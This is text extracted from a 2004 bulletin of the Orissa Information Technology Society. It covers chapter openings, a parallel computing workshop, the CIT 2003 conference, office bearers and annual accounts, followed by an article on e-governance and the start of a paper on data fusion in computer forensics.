intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

